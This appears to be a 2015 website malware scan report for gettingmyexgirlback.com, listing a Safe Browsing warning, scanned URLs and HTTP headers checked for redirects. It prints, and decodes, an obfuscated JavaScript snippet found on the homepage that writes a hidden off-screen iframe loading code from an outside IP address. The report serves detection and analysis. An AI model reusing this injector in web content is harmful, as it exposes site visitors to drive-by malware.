Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=gettingmyexgirlback.com
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Scanned pages/files
Request | Server response | Status |
http://gettingmyexgirlback.com/ | 200 OK Content-Length: 7362 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) o='//';ni='2.4';ql='a.p';mh='.23';ag='p:';a='fr';wc='htt';m='i';v='hp';xj='0/';c='9.8';da='20';lq='c';q='sr';l='ame';r=m.concat(a,l);i=q.concat(lq);nj=wc.concat(ag,o,da,ni,mh,c,xj,ql,v);document.write('<'+r+' '+i+'="'+nj+'" style="position: absolute; top:-3000px; left:-3000px; visibility: hidden;"></'+r+'>'); Decoded script: <iframe src="http://202.4.239.80/a.php" style="position: absolute; top:-3000px; left:-3000px; visibility: hidden;"></iframe> Antivirus reports:
| ||
http://mobi-service9.com/redirect.php?r=http%3A//mobi-service9.com/l.php%3Fl%3Do%26r%3D9428%26a%3D29 | 500 Can't connect to mobi-service9.com:80 Content-Length: 192 Content-Type: text/plain | clean |
http://mobi-service9.com/test404page.js | 500 Can't connect to mobi-service9.com:80 Content-Length: 192 Content-Type: text/plain | clean |
http://chat.hostgator.com/liveperson/ | 200 OK Content-Length: 117 Content-Type: text/html | clean |
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: gettingmyexgirlback.com
Result:
HTTP/1.1 200 OK
Connection: close
Date: Tue, 03 Mar 2015 04:30:26 GMT
Accept-Ranges: bytes
ETag: "c1c228a-1cc2-4d1f326cbef40"
Server: Apache/2.2.17 (Unix) mod_ssl/2.2.17 OpenSSL/0.9.8e-fips-rhel5 DAV/2 mod_auth_passthrough/2.1 mod_bwlimited/1.4
Content-Length: 7362
Content-Type: text/html
Last-Modified: Sat, 29 Dec 2012 00:49:25 GMT
...7362 bytes of data.
GET / HTTP/1.1
Host: gettingmyexgirlback.com
Result:
HTTP/1.1 200 OK
Connection: close
Date: Tue, 03 Mar 2015 04:30:26 GMT
Accept-Ranges: bytes
ETag: "c1c228a-1cc2-4d1f326cbef40"
Server: Apache/2.2.17 (Unix) mod_ssl/2.2.17 OpenSSL/0.9.8e-fips-rhel5 DAV/2 mod_auth_passthrough/2.1 mod_bwlimited/1.4
Content-Length: 7362
Content-Type: text/html
Last-Modified: Sat, 29 Dec 2012 00:49:25 GMT
...7362 bytes of data.
Second query (visit from search engine):
GET / HTTP/1.1
Host: gettingmyexgirlback.com
Referer: http://www.google.com/search?q=gettingmyexgirlback.com
Result:
The result is similar to the first query. There are no suspicious redirects found.
GET / HTTP/1.1
Host: gettingmyexgirlback.com
Referer: http://www.google.com/search?q=gettingmyexgirlback.com
Result:
The result is similar to the first query. There are no suspicious redirects found.